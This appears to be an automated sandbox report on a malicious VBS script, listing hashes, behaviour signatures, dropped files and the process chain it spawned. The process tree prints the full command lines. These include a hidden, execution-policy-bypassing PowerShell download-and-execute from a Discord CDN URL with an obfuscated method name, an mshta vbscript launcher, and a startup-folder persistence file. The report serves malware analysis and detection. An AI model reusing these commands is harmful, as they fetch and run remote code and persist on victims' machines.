Analysis
-
max time kernel
17s -
max time network
154s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
15-09-2021 08:29
Static task
static1
Behavioral task
behavioral1
Sample
e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs
Resource
win7v20210408
General
-
Target
e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs
-
Size
828B
-
MD5
9af0d5fbc14e3ac0ae409dfef6e04228
-
SHA1
931b3139830e5485f198bb72ecba50475e4c8df2
-
SHA256
e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed
-
SHA512
fdca50df12edb4d7784a3c769908a695221456e8729b7ec61ec86b8328a18040c5aca7f2d6879f336b6c1a44b1323a8f1f05ff6dd14a4cbd9f233fedcd019f0e
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 2020 powershell.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.vbs powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 2020 powershell.exe 2020 powershell.exe 1252 powershell.exe 1252 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 1252 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.exepowershell.exeWScript.execmd.exemshta.exedescription pid process target process PID 1100 wrote to memory of 2020 1100 WScript.exe powershell.exe PID 1100 wrote to memory of 2020 1100 WScript.exe powershell.exe PID 1100 wrote to memory of 2020 1100 WScript.exe powershell.exe PID 2020 wrote to memory of 696 2020 powershell.exe WScript.exe PID 2020 wrote to memory of 696 2020 powershell.exe WScript.exe PID 2020 wrote to memory of 696 2020 powershell.exe WScript.exe PID 696 wrote to memory of 324 696 WScript.exe cmd.exe PID 696 wrote to memory of 324 696 WScript.exe cmd.exe PID 696 wrote to memory of 324 696 WScript.exe cmd.exe PID 324 wrote to memory of 1456 324 cmd.exe mshta.exe PID 324 wrote to memory of 1456 324 cmd.exe mshta.exe PID 324 wrote to memory of 1456 324 cmd.exe mshta.exe PID 1456 wrote to memory of 1252 1456 mshta.exe powershell.exe PID 1456 wrote to memory of 1252 1456 mshta.exe powershell.exe PID 1456 wrote to memory of 1252 1456 mshta.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")5⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
715a8616bed900968c1073f51a046daa
SHA1995665c72cfa9c88d8edab3e6212b17ac479aab8
SHA2560d433c2cd57ed977bf3681c0b0eb87acf21a237647eee1afd741c008fe22740e
SHA5128c99f8ba6b03e4bca03116132dd93bea84e8fd0e49a0f7b67d46533e0e735a0c3301bde4c18e6e45659e8fa3f68fcf12c78017d9740c5220d76bfe4b2908a8a1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
614da39dd1b9bc0cad2bf9331f98340c
SHA172dd5336860a1a3e500f779f78a935d84970c14d
SHA256266e4fb9d33676d994247bd0136bf588f7811cf2c325fa82fddbd77a6d8c7663
SHA512e846c6a133551925df78c7029a9051f390736acc13ce75a7ab64e91e4283f785aa057af8427b1b0f01320685647bb3021d1bdc09ea6baa8d6d7bbb2a2c86196c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBSMD5
558a8b7b3fdef4ca79110f8cfd126694
SHA1d6e96ca27f701b3f4c24885dacd14c762a9d36b0
SHA25638c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7
SHA51237d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283
-
C:\Users\Admin\AppData\Roaming\SystemLogin.batMD5
7f85382953fde20b101039d48673dbd2
SHA15ebaa67f5862b2925d9029f4761b7e2ce9a99dd9
SHA256fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f
SHA5126e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46
-
C:\Users\Public\myScript.ps1MD5
317f5c7ef5b887966f963c21a60e2889
SHA15078bdb3e7376202c7253a8b428a360e1c047863
SHA256cd7143c00ef7711ccdcc6877d6d393e4f6e2bb2aef26bf2214b81e660f7c7cdd
SHA512e4d6590082671997ef08550d48b5ff43dd63a1811c4b883bbe75a9a5e22087b5928be43e624632bdaf8c01d4334ae397c672d1695900d1bd25e7a27a03b10750
-
memory/324-76-0x0000000000000000-mapping.dmp
-
memory/696-72-0x0000000000000000-mapping.dmp
-
memory/1100-60-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmpFilesize
8KB
-
memory/1252-85-0x000000001AC34000-0x000000001AC36000-memory.dmpFilesize
8KB
-
memory/1252-78-0x0000000000000000-mapping.dmp
-
memory/1252-84-0x000000001AC30000-0x000000001AC32000-memory.dmpFilesize
8KB
-
memory/1252-91-0x0000000002520000-0x0000000002522000-memory.dmpFilesize
8KB
-
memory/1456-77-0x0000000000000000-mapping.dmp
-
memory/2020-66-0x0000000001E10000-0x0000000001E11000-memory.dmpFilesize
4KB
-
memory/2020-71-0x000000001B610000-0x000000001B611000-memory.dmpFilesize
4KB
-
memory/2020-70-0x0000000001FE0000-0x0000000001FE2000-memory.dmpFilesize
8KB
-
memory/2020-69-0x000000001B9E0000-0x000000001B9E1000-memory.dmpFilesize
4KB
-
memory/2020-68-0x0000000002974000-0x0000000002976000-memory.dmpFilesize
8KB
-
memory/2020-67-0x0000000001E40000-0x0000000001E41000-memory.dmpFilesize
4KB
-
memory/2020-61-0x0000000000000000-mapping.dmp
-
memory/2020-63-0x0000000002970000-0x0000000002972000-memory.dmpFilesize
8KB
-
memory/2020-65-0x000000001AD60000-0x000000001AD61000-memory.dmpFilesize
4KB
-
memory/2020-64-0x0000000001CA0000-0x0000000001CA1000-memory.dmpFilesize
4KB